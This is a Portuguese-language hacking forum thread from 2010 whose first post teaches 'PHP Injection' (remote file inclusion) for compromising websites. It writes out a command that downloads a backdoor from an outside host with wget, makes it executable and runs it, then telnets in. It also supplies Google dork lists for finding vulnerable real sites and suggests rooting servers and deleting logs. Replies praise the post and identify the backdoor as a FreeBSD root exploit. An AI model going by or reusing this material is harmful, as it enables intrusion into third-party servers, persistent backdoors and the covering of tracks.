Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Php injection

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Dica Php injection

    Bom, muita gente tem duvidas sobre PHP Injection, provavelmente a vulnerabilidade mais comum entre defacers/owners.
    A vulnerabilidade acontece por desconhecimento do webmaster, ou por distração, eles colocam ‘includes’ para ajudar na criação do seu site sem fazer nenhuma verificação das ’strings’
    Um exemplo de um site vulneravel, com 3 partes em uma tabela:

    include(‘topo.php’);
    include(‘menu.php’);
    include($page);
    Existem várias strings, a mais comum é page..
    Então um endereço ficticio: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Neste exemplo ele carregaria a página novidades.php do site.. Se ela for vulneravel dá para ‘injetar’ páginas maliciosas que executam comandos na maquina que roda o site (por isso o nome PHP Injection)

    Estarei usando esse script como referencia (chamado de cmd):

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Obviamente você tentaria: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... … if?&cmd=ls
    Ops! Se a página for vulneravel ela vai carregar! Se ela funcionar e não estiver em safe mode (uma opção do php.ini) vai listar os arquivos do site (comando ls).
    Não é só isso, a partir daqui você usa a sua criatividade, rodar backdoor para ter acesso remoto (por telnet/putty), pacotar pessoas e servers, configurar psybnc, etc.. Só precisará saber alguns comandos de Linux/FreeBSD/SunOS..
    Backdoor: kmzrox.by.ru/r0nin
    Para usar coloque no ‘cmd’ cd /tmp;wget kmzrox.by.ru/r0nin;chmod 777 r0nin;./r0nin
    entra na pasta tmp, baixa a backdoor (exploit), coloca permissão para o arquivo e roda ele
    Por exemplo: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... … in;./r0nin
    Se tudo ocorrer bem e não tiver firewall agora vá iniciar > executar > telnet Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... 1666, pronto, você está na maquina, enjoy! :~)

    Para procurar no google as páginas separei uma lista de chaves, lembrando que você pode usar inurl:”.pt” (escolhendo a classe do dominio) para procurar páginas somente de um país.

    allinurl:”.php?page=”
    allinurl:”.php?inc=”
    allinurl:”.php?body=”
    allinurl:”.php?main=”
    allinurl:”.php?pag=”
    allinurl:”.php?p=”
    allinurl:”.php?content=”
    allinurl:”.php?cont=”
    allinurl:”.php?c=”
    allinurl:”.php?meio=”
    allinurl:”.php?x=”
    allinurl:”.php?cat=”
    allinurl:”.php?site=”
    allinurl:”.php?m=”
    allinurl:”.php?do=”
    allinurl:”.php?x=”
    allinurl:”.php?content=”
    allinurl:”.php?pagina=”
    allinurl:”.php?root=”
    allinurl:”.php?include=”
    allinurl:”.php?open=”
    allinurl:”.php?visualizar=”
    allinurl:”.php?conf=”
    Achará varios sites, a maioria no padrão:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... … e=nat_conf
    Agora é simples, você tem os sites pra procurar e uma cmd, agora é só ir de página em página substituindo os valores da string page para o cmd que vai usar :}
    Você pode utilizar exploits para tentar conseguir root (super user) na máquina, assim ter permissão para fazer TUDO com os sites que estão dentro dela, apagar todos os logs, etc.
    Aqui vai uma lista de páginas vulneraveis (depois de ler isso vocês já saberão o que fazer), a maioria está protegida ou com firewall, é só para mostrar o que vai acontecer quando uma página é vulneravel :~)
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... … p?content=
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... … .php?page=
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Páginas com passthru() bloqueados, quando não aparece nada na box são ignorados, pode continuar procurando. Estou só compartilhando meus conhecimentos, se alguem tiver alguma coisa para complementar


    Créditos: dsoul
    Last edited by H4ck3r4lp; 11-03-2010, 00:34.

  • Font Size
    #2
    Boas dicas, brother.

    Keep sharing!

    regards,
    Bitraptor

    Comment


    • Font Size
      #3
      gostei... to precisando desenvolver mais meu php injection

      valeu !
      sigpic

      Comment


      • Font Size
        #4
        ai firmezza......legal o post.... da pra postar ai uma video aula....esplicando com detalhes.....
        falowwwwwwwwwwwwwwww
        devil port.......... esplorando o submundo

        Comment


        • Font Size
          #5
          onde encontro o r0nin ?

          Comment


          • Font Size
            #6
            /// File Name: ronin.c
            Description:
            Ronin.c is a FreeBSD-4.2 remote root exploit. Requires user access and a writable home directory without chroot.

            Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

            Comment


            • Font Size
              #7
              Boa.. gostei do post.
              sigpic

              Comment

              X
              Working...
              X